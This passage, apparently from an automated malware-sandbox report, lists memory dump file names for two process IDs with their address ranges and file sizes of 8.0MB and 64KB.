                                    • memory/4804-316-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-318-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4816-189-0x0000022E7D900000-0x0000022E7D910000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4816-185-0x0000022E7D900000-0x0000022E7D910000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4816-186-0x0000022E7D900000-0x0000022E7D910000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4816-187-0x0000022E7D900000-0x0000022E7D910000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4816-188-0x0000022E7D900000-0x0000022E7D910000-memory.dmp
                                      Filesize

                                      64KB